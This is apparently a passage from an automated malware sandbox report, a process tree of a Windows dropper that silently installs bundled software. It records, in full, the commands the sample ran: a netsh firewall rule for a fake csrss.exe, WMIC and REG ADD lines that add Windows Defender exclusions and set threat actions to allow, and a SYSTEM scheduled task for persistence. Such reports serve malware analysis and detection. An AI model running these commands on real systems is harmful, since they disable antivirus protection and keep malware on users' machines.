PID:3032

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4380

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
5⤵
PID:3856

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
6⤵
- Modifies Windows Firewall
PID:4432

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
PID:2148

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:4628

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
PID:2576

C:\Users\Admin\Pictures\13evA9wal9gieIRSHOIx7DVn.exe
"C:\Users\Admin\Pictures\13evA9wal9gieIRSHOIx7DVn.exe" --silent --allusers=0
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:4840

C:\Users\Admin\Pictures\13evA9wal9gieIRSHOIx7DVn.exe
C:\Users\Admin\Pictures\13evA9wal9gieIRSHOIx7DVn.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x2a0,0x2a4,0x2a8,0x27c,0x2ac,0x6ee0e1d0,0x6ee0e1dc,0x6ee0e1e8
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4132

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\13evA9wal9gieIRSHOIx7DVn.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\13evA9wal9gieIRSHOIx7DVn.exe" --version
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1092

C:\Users\Admin\Pictures\13evA9wal9gieIRSHOIx7DVn.exe
"C:\Users\Admin\Pictures\13evA9wal9gieIRSHOIx7DVn.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=4840 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240418230446" --session-guid=a863f3da-9d8b-4580-ac22-12821abc3d33 --server-tracking-blob="ZGIwYzA1NzFiZTQ1MDc2ODU1MzY4MmZlYWExNGQ1NDZkZDM3MTNiOTQ1OGUzNDVkZGY5ZjMyNjlmYmY1ZWFmYzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fMTIzIiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTAiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzEzNDgxNDc0LjMwMDUiLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzEyMyIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiYmI0NTUyYjItNDg3NC00ZDdkLWEzM2UtZDVmN2E5ZDIzNGY2In0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=A804000000000000
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:1488

C:\Users\Admin\Pictures\13evA9wal9gieIRSHOIx7DVn.exe
C:\Users\Admin\Pictures\13evA9wal9gieIRSHOIx7DVn.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x2ac,0x2b0,0x2b4,0x27c,0x2b8,0x6de0e1d0,0x6de0e1dc,0x6de0e1e8
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1936

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404182304461\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404182304461\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"
4⤵
- Executes dropped EXE
PID:3264

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404182304461\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404182304461\assistant\assistant_installer.exe" --version
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4388

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404182304461\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404182304461\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x230,0x234,0x238,0x20c,0x23c,0xf66038,0xf66044,0xf66050
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3960

C:\Users\Admin\Pictures\Ps6Oo1KnG5cl0a9XxX9mCevu.exe
"C:\Users\Admin\Pictures\Ps6Oo1KnG5cl0a9XxX9mCevu.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3768

C:\Users\Admin\AppData\Local\Temp\7zSEA7F.tmp\Install.exe
.\Install.exe /sQwdidHh "385118" /S
4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:780

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
5⤵
- Suspicious use of WriteProcessMemory
PID:4224

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
6⤵
- Suspicious use of WriteProcessMemory
PID:3960

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4440

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:2144

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 23:06:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\CIIqjcQ.exe\" em /Oxsite_idsMJ 385118 /S" /V1 /F
5⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2964

C:\Users\Admin\Pictures\NS6rGAGIv4P400sLxCOtLJyY.exe
"C:\Users\Admin\Pictures\NS6rGAGIv4P400sLxCOtLJyY.exe"
3⤵
- Modifies firewall policy service
- Executes dropped EXE
- Drops file in System32 directory
PID:3968

C:\Users\Admin\Pictures\YSnN50VmgnYtv0QvhS8rLDMo.exe
"C:\Users\Admin\Pictures\YSnN50VmgnYtv0QvhS8rLDMo.exe"
3⤵
PID:3980

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exe
4⤵
PID:4768

C:\Windows\SYSTEM32\msiexec.exe
"msiexec.exe" /qn /i VirtualBox-6.1.20-r143896.msi ADDLOCAL=VBoxApplication,VBoxPython VBOX_INSTALLDESKTOPSHORTCUT=0 VBOX_INSTALLQUICKLAUNCHSHORTCUT=0 /log "C:\Users\Admin\AppData\Local\Temp\charityengine-install-vbox-log.txt"
5⤵
PID:3288

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce_7.14.2_windows_x86_64.exe
"ce_7.14.2_windows_x86_64.exe" /S /v"/qn ACCTMGR_LOGIN=anonymous ACCTMGR_PASSWORDHASH=S16-01 /norestart /log C:\Users\Admin\AppData\Local\Temp\charityengine-install-ce-log.txt"
5⤵
PID:3988

C:\Windows\SYSTEM32\MSIEXEC.EXE
MSIEXEC.EXE /i "C:\Windows\Downloaded Installations\{97657C9B-F62F-4B80-92E3-C146A666778F}\Charity Engine.msi" /qn ACCTMGR_LOGIN=anonymous ACCTMGR_PASSWORDHASH=S16-01 /norestart /log C:\Users\Admin\AppData\Local\Temp\charityengine-install-ce-log.txt SETUPEXEDIR="C:\Users\Admin\AppData\Local\Temp\IXP000.TMP" SETUPEXENAME="ce_7.14.2_windows_x86_64.exe"
6⤵
PID:2976

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
2⤵
PID:4620

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:696

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:4648

C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\CIIqjcQ.exe
C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\CIIqjcQ.exe em /Oxsite_idsMJ 385118 /S
1⤵
- Executes dropped EXE
PID:4500

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3060

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:4380

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:4624

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:4756

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:552

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:4340

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:4220

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:3956

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:2316

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:5112

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
3⤵
PID:4344

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
3⤵
PID:4208

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:1444

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:3160

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:3780

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
PID:2988

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:552

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:4340

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
PID:2508

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:3428

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
3⤵
PID:212

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
3⤵
PID:1272

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
3⤵
PID:2808

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
3⤵
PID:1376

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
3⤵
PID:4016

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
3⤵
PID:3632

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
3⤵
PID:4880

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
3⤵
PID:1520

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
3⤵
PID:4032

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
3⤵
PID:1272

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:64;"
2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3856

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2112

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:3988

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4756

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1720

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3492

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3004

C:\Windows\SysWOW64\reg.exe
